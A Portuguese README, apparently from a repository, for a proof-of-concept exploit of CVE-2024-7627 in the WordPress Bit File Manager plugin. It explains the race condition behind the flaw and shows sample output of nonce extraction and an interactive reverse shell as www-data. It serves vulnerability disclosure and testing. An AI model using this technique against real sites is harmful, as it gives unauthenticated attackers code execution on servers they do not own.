
Exploit de prova de conceito para CVE-2024-7627, uma vulnerabilidade de execução remota de código não autenticada no plugin WordPress Bit File Manager. Automatiza extração de nonce, exploração de condição de corrida e fornece um reverse shell interativo.
Este repositório contém um exploit de prova de conceito (PoC) para CVE-2024-7627, uma vulnerabilidade crítica de Execução Remota de Código (RCE) não autenticada no plugin WordPress Bit File Manager (versões 6.0 – 6.5.5).
Quando o recurso Guest User Read está habilitado, o plugin expõe uma condição de corrida dentro da função checkSyntax.
Essa função grava um arquivo PHP temporário em /wp-content/uploads/ antes da validação, permitindo que atacantes solicitem o arquivo e executem comandos arbitrários do sistema.
requests, aiohttp, asyncio, beautifulsoup4Instale as dependências:
pip install requests aiohttp beautifulsoup4
[*] Getting a valid AJAX nonce...
[+] Found the valid AJAX nonce: 65a1d91c63
[*] Getting a random file hash...
[+] Starting interactive shell. Type 'exit' to quit.
lab-shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
lab-shell> uname -a
Linux victim-wp 5.15.0-78-generic #85-Ubuntu SMP x86_64 GNU/Linux
lab-shell> whoami
www-data